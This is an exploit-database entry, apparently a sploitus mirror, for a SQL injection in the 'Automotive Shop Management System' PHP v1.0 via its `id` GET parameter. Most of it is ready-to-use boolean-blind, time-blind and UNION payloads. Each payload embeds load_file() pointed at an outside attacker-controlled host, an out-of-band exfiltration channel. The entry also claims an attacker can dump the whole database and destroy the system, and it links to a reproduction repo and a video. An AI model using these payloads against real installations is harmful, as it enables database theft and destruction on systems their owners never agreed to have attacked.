Share 
## https://sploitus.com/exploit?id=1337DAY-ID-38087
## Title: ASMS - PHP (by: oretnom23 ) v1.0 SQLi
## Author: nu11secur1ty
## Vendor: https://github.com/oretnom23,
https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/download-code?nid=15312&title=Automotive+Shop+Management+System+in+PHP%2FOOP+Free+Source+Code
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0

## Description:
The `id` parameter appears to be vulnerable to SQL injection attacks.
The attacker can dump all database information without any problems,
and then he can destroy this system, it is depending
from the scenario.

## STATUS: Critically awful

[+] Payload:

```MySQL
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: id=7'+(select
load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''
OR NOT 9828=9828 AND 'NWsG'='NWsG

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=7'+(select
load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''
AND (SELECT 9682 FROM (SELECT(SLEEP(5)))Oifb) AND 'zARc'='zARc

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=7'+(select
load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''
UNION ALL SELECT
NULL,CONCAT(0x7176626271,0x71504455436c68624e7878795354674d76627a4b4164756a4c46537651584b67584d744963504b5a,0x716a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0)

## Proof and Exploit:
[href](https://streamable.com/c5v75u)

## Time spent
`00:27:00`

## Time attack
`00:01:57`